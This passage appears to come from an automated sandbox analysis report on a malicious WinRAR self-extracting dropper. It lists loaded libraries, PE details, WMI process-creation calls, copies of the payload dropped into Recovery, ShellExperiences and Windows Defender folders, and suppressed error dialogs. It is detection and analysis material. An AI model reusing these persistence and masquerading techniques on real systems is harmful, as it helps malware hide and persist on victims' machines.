                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: hz7DzW2Yop.exeStatic file information: File size 2926873 > 1048576
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: hz7DzW2Yop.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: hz7DzW2Yop.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000000.1666308899.0000000000933000.00000002.00000001.01000000.00000003.sdmp, hz7DzW2Yop.exe, 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: hz7DzW2Yop.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: hz7DzW2Yop.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: hz7DzW2Yop.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: hz7DzW2Yop.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: hz7DzW2Yop.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | File created: C:\HyperWebbroker\__tmp_rar_sfx_access_check_5763437
                                    Source: hz7DzW2Yop.exe | Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091F640 push ecx; ret 0_2_0091F653
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091EB78 push eax; ret 0_2_0091EB96
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA12A4 push cs; retf 5_2_00007FFD9BBA12A7
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA8147 push ebx; ret 5_2_00007FFD9BBA816A
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BB96FF0 push esp; iretd 5_2_00007FFD9BB96FF1
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BBA7547 push ebx; iretd 5_2_00007FFD9BBA756A
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Code function: 5_2_00007FFD9BC375A1 push ss; retf 5_2_00007FFD9BC375A7
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9B8ED2A5 pushad ; iretd 21_2_00007FFD9B8ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9BA0ADE8 push E956CEA2h; ret 21_2_00007FFD9BA0AE29
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9BA0BAE8 push E85A63D7h; ret 21_2_00007FFD9BA0BAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9BA03EEE pushad ; iretd 21_2_00007FFD9BA03F9B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFD9BAD2316 push 8B485F93h; iretd 21_2_00007FFD9BAD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_00007FFD9B8ED2A5 pushad ; iretd 22_2_00007FFD9B8ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_00007FFD9BA03EEE pushad ; iretd 22_2_00007FFD9BA03F9B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 22_2_00007FFD9BAD2316 push 8B485F93h; iretd 22_2_00007FFD9BAD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B8DD2A5 pushad ; iretd 24_2_00007FFD9B8DD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9FBAE8 push E85A64D7h; ret 24_2_00007FFD9B9FBAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9B9FADF7 push E956CFA2h; ret 24_2_00007FFD9B9FAE29
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 24_2_00007FFD9BAC2316 push 8B485F94h; iretd 24_2_00007FFD9BAC231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 26_2_00007FFD9B90D2A5 pushad ; iretd 26_2_00007FFD9B90D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 26_2_00007FFD9BAF2316 push 8B485F91h; iretd 26_2_00007FFD9BAF231B
                                    Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA61B85 push ecx; iretd 35_2_00007FFD9BA61BB4
                                    Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA6593D push cs; retf 35_2_00007FFD9BA6597F
                                    Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA23FA2 pushad ; retf 35_2_00007FFD9BA23FA5
                                    Source: C:\Recovery\uAsLgsGzSk.exe | Code function: 35_2_00007FFD9BA2C900 push es; iretd 35_2_00007FFD9BA2C907

                                    Persistence and Installation Behavior

                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\IitSDvGY.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\CvvLBlqK.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\zHJVyCcw.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\qeoNTMEG.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\LqKTzAAu.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Recovery\uAsLgsGzSk.exe
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\FyhuXVvF.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\hnxxzxgb.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\eIxzTFKJ.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\JwbtnRPV.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\maPwcuvP.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\mlFoDzaq.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\GvICsVKA.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\zIxCDFUn.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\qTMMgMAe.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\xRAMIbuT.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\HupKRiKa.log
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | File created: C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\htcPaTVC.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Recovery\SystemSettings.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\vJjMMWBx.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\QdcRcxPi.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\NVLRgsWM.log
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File created: C:\Users\user\Desktop\vPOensqX.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Users\user\Desktop\cIDyHnkk.log
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Windows\ShellExperiences\uAsLgsGzSk.exeJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\NVLRgsWM.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\vJjMMWBx.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\maPwcuvP.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\HupKRiKa.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\cIDyHnkk.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\JwbtnRPV.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zIxCDFUn.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zHJVyCcw.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\IitSDvGY.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\hnxxzxgb.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\qeoNTMEG.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\CvvLBlqK.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\htcPaTVC.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\FyhuXVvF.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\vPOensqX.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\mlFoDzaq.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\eIxzTFKJ.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\LqKTzAAu.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\qTMMgMAe.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\QdcRcxPi.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\GvICsVKA.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\xRAMIbuT.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (20 events)
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (15 events)
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 events)
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Process information set: NOOPENFILEERRORBOX (53 events)
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (80 events)
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
